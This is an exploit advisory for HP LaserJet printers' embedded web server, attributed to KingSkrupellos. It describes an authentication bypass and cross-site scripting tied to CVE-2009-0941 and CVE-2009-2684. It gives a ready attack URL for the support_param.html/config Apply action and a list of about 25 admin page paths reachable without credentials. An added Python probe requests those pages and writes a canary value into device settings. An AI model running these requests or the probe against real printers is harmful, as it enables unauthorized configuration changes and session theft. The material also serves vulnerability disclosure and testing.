- ############################################################################################
- # Exploit Title : HP LaserJet Pro M501dn Printers 6.7.0.x Authentication Bypass - Cross Site Scripting
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 04/04/2019
- # Vendor Homepage : hp.com
- # Software Information Link :
- 8.hp.com/tr/tr/products/printers/product-detail.html?oid=7710401
- # Software Version :
- Driver-Universal Print Driver for Managed Services => 6.7.0.23989
- Driver-Universal Print Driver => 6.7.0.23989
- Software Universal Printer Driver => 1.8.6
- Firmware Datecode => 20150924
- Control Panel Version => 0x00
- Maximum Print Quality => ProRes 1200
- # Tested On : Windows and Linux
- # Category : Hardware
- # Exploit Risk : High / Medium
- # Common Vulnerabilities and Exposures (CVE) :
- CVE-2009-0941
- CVE-2009-2684
- # Vulnerability Type :
- CWE-306 [ Missing Authentication for Critical Function ]
- CWE-592 [ Authentication Bypass Issues (deprecated in CWE; superseded by CWE-287) ]
- CWE-287 [ Improper Authentication ]
- CWE-79 [ Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') ]
- CWE-264 [ Permissions, Privileges, and Access Controls ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ############################################################################################
- # Description about Software :
- ***************************
- HP LaserJet is the brand name of the line of dry electrophotographic (DEP) laser printers marketed by the American
- computer company Hewlett-Packard (HP). The HP LaserJet was the world's first desktop laser printer.
- ############################################################################################
- # Impact :
- ***********
- Authentication Bypass / Missing Authentication For Critical Function :
- ************************************************************
- When an actor claims to have a given identity, the software does not prove, or insufficiently proves, that the claim is correct.
- Remote attackers can read, edit and delete device data and reach the administrative functions without real administrator permission,
- because the EWS never asks for an admin username and password before serving its configuration pages
- (no management password is set by default, see CVE-2009-0941 below).
- The software performs no authentication for functionality that requires a provable user identity
- or that consumes a significant amount of resources.
- The vulnerability allows a remote, unauthenticated attacker to send a specially crafted HTTP request to the
- affected device and change configuration settings or gain administrative access.
- Missing authentication for critical function is a language-independent issue that can appear in any multiuser environment.
- Developing a fix requires understanding the application's security model and the access controls it implements.
- Three basic rules, however, help eliminate improper authorization issues:
- 1) Identify all privileged assets within the application (web pages that display sensitive data,
- sections that contain privileged/administrative functionality, etc.)
- 2) Identify the user roles within the application and their access permissions
- 3) Always check that the user is entitled to access the asset before serving it.
- XSS Cross Site Scripting Impact / Prevention :
- ****************************************
- The EWS pages of the affected printers are prone to a cross-site scripting vulnerability
- because they fail to sufficiently sanitize user-supplied data before writing it back into HTML.
- A remote attacker who gets a target user to open a crafted link can access that user's cookies
- (including authentication cookies, if any) associated with the HP printer interface, read data recently
- submitted by the target user via web form to the device, or take actions on the device acting as the target user.
- The injection points are the (1) Product_URL and (2) Tech_URL parameters of the Apply action on
- support_param.html/config, the same parameters described in CVE-2009-2684 (quoted below).
- Mitigation of the XSS Vulnerability (operator side) :
- ****************************
- set the administrator password, so the Apply action is no longer reachable unauthenticated
- use a fresh browser instance for administrator tasks
- do not access other web sites while performing administrator tasks
- exit the browser when administrator tasks are complete, so no authenticated session survives
- According to the CVE-2009-0941 =>
- *********************************
- The HP Embedded Web Server (EWS) on HP LaserJet Printers, Edgeline Printers, and Digital Senders
- has no management password by default, which makes it easier for remote attackers to obtain access.
- According to the CVE-2009-2684 =>
- *********************************
- Multiple cross-site scripting (XSS) vulnerabilities in Jetdirect and the Embedded Web Server (EWS) on
- certain HP LaserJet and Color LaserJet printers, and HP Digital Senders, allow remote attackers to
- inject arbitrary web script or HTML via the (1) Product_URL or (2) Tech_URL parameter
- in an Apply action to the support_param.html/config script.
- ############################################################################################
- XSS Cross Site Scripting Exploit :
- *******************************
- https://[targetipaddress]/support_param.html/config?Admin_Name=&Admin_Phone=&Product_URL=[XSS]&Tech_URL=[XSS]&Apply=Apply
- Replace [XSS] with the payload. The device accepts the request without any credentials and
- answers with " /success_result.htm/config " ( Configuration Successfully Done ), i.e. the
- unsanitized values have been stored in the Product_URL and Tech_URL settings.
- # Authentication Bypass Exploit / Vulnerability :
- *******************************************
- Each of the following EWS pages loads without credentials when no administrator password is set.
- A 200 response carrying the settings form, rather than a password prompt, confirms the exposure:
- https://[targetipaddress]/hp/device/this.LCDispatcher
- https://[targetipaddress]/hp/device/this.LCDispatcher?nav=hp.EmailServer
- https://[targetipaddress]/hp/device/this.LCDispatcher?nav=hp.Alerts&subpage=1&lstid=-1
- https://[targetipaddress]/hp/device/this.LCDispatcher?nav=hp.Alerts&subpage=3&lstid=1
- https://[targetipaddress]/hp/device/this.LCDispatcher?nav=hp.Alerts
- https://[targetipaddress]/hp/device/this.LCDispatcher?nav=hp.AutoSend
- https://[targetipaddress]/hp/device/this.LCDispatcher?nav=hp.Security&fldPage=0
- https://[targetipaddress]/hp/device/this.LCDispatcher?nav=hp.OtherLinks
- https://[targetipaddress]/hp/device/this.LCDispatcher?nav=hp.Config
- https://[targetipaddress]/hp/device/this.LCDispatcher?nav=hp.DeviceInfoConfig
- https://[targetipaddress]/info_configuration.html?tab=Home&menu=DevConfig
- https://[targetipaddress]/hp/device/Auth/set_config_deviceinfo.htm
- https://[targetipaddress]/hp/device/info_configuration.htm
- https://[targetipaddress]/hp/jetdirect
- https://[targetipaddress]/config_pro.htm
- https://[targetipaddress]/tcpipv6.htm
- https://[targetipaddress]/tcpipv4.htm
- https://[targetipaddress]/tcp_param.htm
- https://[targetipaddress]/network_id.htm
- https://[targetipaddress]/tcp_summary.htm
- https://[targetipaddress]/index_info.htm
- https://[targetipaddress]/support_param.html
- https://[targetipaddress]/support.htm
- https://[targetipaddress]/tcp_diag.htm
- https://[targetipaddress]/configpage.htm
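- The following probe ties the two findings above together: it requests a subset of the listed EWS pages with no credentials and classifies each answer, then sends the support_param.html/config Apply request with a harmless canary instead of [XSS] and checks whether the canary comes back unencoded. This is an added example written for this page, not the advisory author's tool and not HP code. The paths and parameter names are the advisory's; the "login" redirect marker, the name="Apply" form marker used to recognise a settings page, the host printer.example and all sample responses are assumptions made for the example.

```python
"""Unauthenticated EWS probe for the pages and the XSS request in this advisory.
Added example, not the advisory author's tool.  Assumed (not from the advisory):
the 'login' redirect marker, the name="Apply" form marker, all sample responses."""
import re
import ssl
import urllib.error
import urllib.parse
import urllib.request

# Subset of the pages the advisory lists as reachable without credentials (paths verbatim).
EWS_PAGES = [
    "/hp/device/this.LCDispatcher?nav=hp.Security&fldPage=0",
    "/hp/device/this.LCDispatcher?nav=hp.Config",
    "/hp/device/this.LCDispatcher?nav=hp.EmailServer",
    "/hp/device/info_configuration.htm",
    "/hp/jetdirect",
    "/tcpipv4.htm",
    "/support_param.html",
]

# Harmless, unique canary: it closes an attribute and a tag but is not itself a script.
CANARY = 'x"><canary-7f2d>'


def classify(status, location, body):
    """Label one unauthenticated GET as 'protected', 'exposed' or 'unknown'.

    exposed   = 200 and the page carries an EWS settings form (submit named Apply, assumed marker)
    protected = 401/403, or a redirect whose target looks like a login page (assumed marker)
    """
    if status in (401, 403):
        return "protected"
    if status in (301, 302, 303, 307, 308):
        return "protected" if location and "login" in location.lower() else "unknown"
    if status == 200 and re.search(r'<input[^>]+name="Apply"', body, re.I):
        return "exposed"
    return "unknown"


def xss_probe_url(base, canary=CANARY):
    """Build the advisory's Apply request with the canary in place of [XSS]."""
    params = {"Admin_Name": "", "Admin_Phone": "", "Product_URL": canary,
              "Tech_URL": canary, "Apply": "Apply"}
    return base.rstrip("/") + "/support_param.html/config?" + urllib.parse.urlencode(params)


def reflected_unencoded(body, canary=CANARY):
    """True when the canary comes back verbatim, i.e. quote and angle brackets were not
    HTML-encoded.  A fixed device returns it as &quot;&gt;&lt; and this is False."""
    return canary in body


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Surface 3xx responses instead of following them, so Location can be inspected."""
    def redirect_request(self, *args, **kwargs):
        return None


def fetch_plain(url, timeout=5.0):
    """Real fetcher: (status, Location header, body).  TLS verification is off because
    the EWS normally presents a self-signed certificate."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    opener = urllib.request.build_opener(_NoRedirect, urllib.request.HTTPSHandler(context=ctx))
    req = urllib.request.Request(url, headers={"User-Agent": "ews-probe"})
    try:
        with opener.open(req, timeout=timeout) as r:
            return r.status, r.headers.get("Location"), r.read().decode("latin-1", "replace")
    except urllib.error.HTTPError as e:
        return e.code, e.headers.get("Location"), e.read().decode("latin-1", "replace")


def probe(base, fetch=fetch_plain):
    """Probe every listed page, then send the Apply request and check whether the canary
    is reflected unencoded in the support page.  NOTE: the Apply request overwrites the
    device's Product_URL/Tech_URL settings; record them first and restore them afterwards."""
    results = {path: classify(*fetch(base.rstrip("/") + path)) for path in EWS_PAGES}
    fetch(xss_probe_url(base))                 # advisory: answers with /success_result.htm/config
    _, _, page = fetch(base.rstrip("/") + "/support_param.html")
    results["xss_reflected"] = reflected_unencoded(page)
    return results


# Constructed sample responses standing in for a device that has no admin password.
SAMPLE_RESPONSES = {
    "/tcpipv4.htm": (200, None, '<form><input name="IPv4" value="10.0.0.5">'
                                '<input type="submit" name="Apply" value="Apply"></form>'),
    "/support_param.html": (200, None, '<form><input name="Product_URL" value="' + CANARY + '">'
                                       '<input type="submit" name="Apply" value="Apply"></form>'),
    "/support_param.html/config": (302, "/success_result.htm/config", ""),
}


def fake_fetch(url):
    """Offline fetcher over the constructed sample; unlisted pages answer like an exposed EWS."""
    path = urllib.parse.urlsplit(url).path
    return SAMPLE_RESPONSES.get(path, (200, None, '<form><input type="submit" name="Apply" value="Apply"></form>'))


def demo():
    """Run the probe against the constructed sample instead of a live printer."""
    return probe("https://printer.example", fake_fetch)


if __name__ == "__main__":
    for page, verdict in demo().items():
        print(f"{page:60} {verdict}")
```

- Against a real device call probe("https://<printer>") and expect "protected" on every page once an administrator password is set; any "exposed" entry, or xss_reflected being True, reproduces the advisory. The redirect handler is there because a device that does enforce a password answers the configuration pages with a redirect to its login page, which a redirect-following client would silently turn into a 200.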
- ############################################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ############################################################################################